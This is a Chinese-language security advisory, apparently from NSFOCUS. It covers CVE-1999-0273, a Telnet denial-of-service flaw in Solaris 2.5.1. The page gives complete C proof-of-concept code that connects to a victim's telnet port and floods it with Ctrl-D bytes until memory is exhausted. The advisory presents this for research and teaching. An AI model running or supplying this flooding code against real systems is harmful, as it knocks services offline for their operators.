安全研究

安全漏洞
Solaris Telnet服务远程Ctrl-D字符拒绝服务漏洞

发布日期:1997-12-13
更新日期:1997-12-13

受影响系统:
Sun Solaris 2.5.1
描述:
CVE(CAN) ID: CVE-1999-0273

Solaris是一款由Sun Microsystems公司开发和维护的商业性质UNIX操作系统。

Solaris包含的Telnet服务实现上漏洞,远程攻击者可以利用这个漏洞使机器消耗大量内存,系统失去响应产生拒绝服务。


<*来源:Jason Zapman II (zapman@CC.GATECH.EDU
  *>

测试方法:

警 告

以下程序(方法)可能带有攻击性,仅供安全研究与教学之用。使用者风险自负!

Jason Zapman II (zapman@CC.GATECH.EDU)提供了如下测试代码:


/*
    **  To make, if your system is BSD'ish:  gcc <thisfile>
    **       ...if your system is SysV'ish:  gcc -lnsl -lsocket <thisfile>
    **
    **  Usage: a.out <victim's hostname>
    **
    **  Have fun!
    */

    #include <signal.h>
    #include <sys/types.h>
    #include <sys/socket.h>
    #include <netinet/in.h>
    #include <netdb.h>
    #include <arpa/telnet.h>
    #include <string.h>
    #include <unistd.h>

    #define BUFSIZE 100
    #define DOTS

    void catchit(void)
    {
        printf("\nCaught SIGPIPE -- your link may be too slow.\n");
        exit(1);
    }

    int main(int argc, char *argv[])
    {
        unsigned char kludge_telopt[] = {IAC,WONT,TELOPT_TTYPE,IAC,DO,  \
        TELOPT_SGA,IAC,WONT,TELOPT_XDISPLOC,IAC,WONT,TELOPT_NAWS,IAC,WONT, \
        TELOPT_OLD_ENVIRON,IAC,WONT,TELOPT_NEW_ENVIRON,IAC,DO,TELOPT_ECHO};

        unsigned char nastybuf[BUFSIZE];
        struct sockaddr_in sin;
        struct servent *sp;
        struct hostent *hp;
        int s;

        typedef void (*sig_t) (int);
        signal(SIGPIPE,(sig_t)catchit);

        memset(nastybuf,4,BUFSIZE);  /* ascii 4 = ^D */

        if (!(s = socket(AF_INET, SOCK_STREAM, 0))) {
              printf("no socket\n");
              exit(1);
        }

        if (!(hp = gethostbyname(argv[1]))) {
            printf("unknown host\n");
            exit(1);
        }

        bzero(&sin,sizeof(sin));
        bcopy(hp->h_addr,(char *)&sin.sin_addr,hp->h_length);
        sin.sin_family = AF_INET;
        sp = getservbyname("telnet","tcp");
        sin.sin_port = sp->s_port;

        if (connect(s,(struct sockaddr *)&sin,sizeof(sin)) == -1) {
            printf("can't connect to host\n");
            exit(1);
        }

        printf("connected to %s\n",argv[1]);
        write(s,kludge_telopt,21);   /* kludge some telnet negotiation */

        /*  "Let them eat ^Ds..." */

        while (write(s,nastybuf,BUFSIZE) != -1) {

    #ifdef DOTS
            write(STDOUT_FILENO,".",1);
    #endif
        }
    }

建议:
厂商补丁:

Sun
---
目前厂商还没有提供补丁或者升级程序,我们建议使用此软件的用户随时关注厂商的主页以获取最新版本:

http://sunsolve.sun.com/security

浏览次数:21209
严重程度:0(网友投票)
本安全漏洞由绿盟科技翻译整理,版权所有,未经许可,不得转载
绿盟科技给您安全的保障